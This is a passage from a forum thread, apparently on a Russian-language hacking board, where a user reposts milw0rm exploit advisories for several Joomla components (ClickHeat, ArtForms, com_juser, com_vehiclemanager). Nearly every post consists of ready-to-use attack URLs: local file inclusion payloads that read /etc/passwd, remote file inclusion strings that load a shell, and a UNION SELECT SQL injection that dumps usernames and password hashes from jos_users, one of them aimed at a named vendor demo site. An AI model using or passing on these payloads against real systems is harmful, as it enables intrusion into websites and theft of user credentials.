    http://site.com/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=..../../../../../../../etc/passwd%00
    Vuln file: _main.php

    Viln Code:
    Code:
    require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
    Exploit:
    Code:
    http://site.com/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
    Vuln file: main.php

    Viln Code:
    Code:
    require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
    Exploit:
    Code:
    http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
    Vuln file: Cache.php

    Viln Code:
    Code:
    require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');

    Exploit:

    Code:
    http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
    Vuln file: Clickheat_Heatmap.php

    Viln Code:
    Code:
    require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
    Exploit:
    Code:
    http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
    Vuln file: GlobalVariables.php

    Viln Code:
    Code:
    require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
    
    Exploit:
    Code:
    http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
    Нда вобщем-то...)
     
  18. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities

    ArtForms 2.1b7 remote file includes

    From Turkey
    iskorpitx (O bir dünya markası Asla Taklit Edilemez)

    // swfmovie.php - swf output and config

    /* output captcha image */

    /* output captcha mp3 */

    ----------------------------------------------------------------------------------
    Code:
    [path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
    Code:
    [path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
    Code:
    [path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
    -----------------------------------------------------------------------------------
    by iskorpitx
    admin@mavi1.org

    # milw0rm.com [2009-05-15]
     
    #138 swt1, 18 May 2009
    Last edited: 18 May 2009
  19. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection

    ==================================================================================
    Joomla Component com_juser (id) SQL injection Vulnerability
    ==================================================================================

    ###################################################
    [+] Author : Chip D3 Bi0s
    [+] Author Name : Russell...
    [+] Email : chipdebios[alt+64]gmail.com
    [+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
    [+] Group : LatinHackTeam
    [+] Vulnerability : SQL injection
    [+] Google Dork : imagine ;)
    [+] Email : chipdebios[alt+64]gmail.com

    ###################################################

    Code:
    http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
    ------
    SQL code:
    Code:
    +and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
    -----

    Code:
    http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
    +++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    +++++++++++++++++++++++++++++++++++++++


    <creationDate>25.05.2007</creationDate>
    <author>Joomlaequipment</author>
    <copyright>Joomlaequipment"©2007</copyright>
    <license>Comercial</license>
    <authorEmail>support@joomlaequipment.com</authorEmail>
    <authorUrl>http://joomlaequipment.com</authorUrl>
    <version>2.0.4</version>
    <description>Registration Manager</description>

    # milw0rm.com [2009-06-01]
     
    1 person likes this.
  20. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Joomla Component com_vehiclemanager 1.0 RFI Vulnerability

    =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

    Joomla com_vehiclemanager 1.0 Remote File Include

    Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html

    =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

    Found: xoron

    contact: xorontr@gmail.com (only e-mail)

    =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

    Exploit:
    -> ...
    Code:
    /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?
    =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

    Thanx: str0ke, VoLkan

    =-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

    # milw0rm.com [2009-06-09]
     
    1 person likes this.
Loading...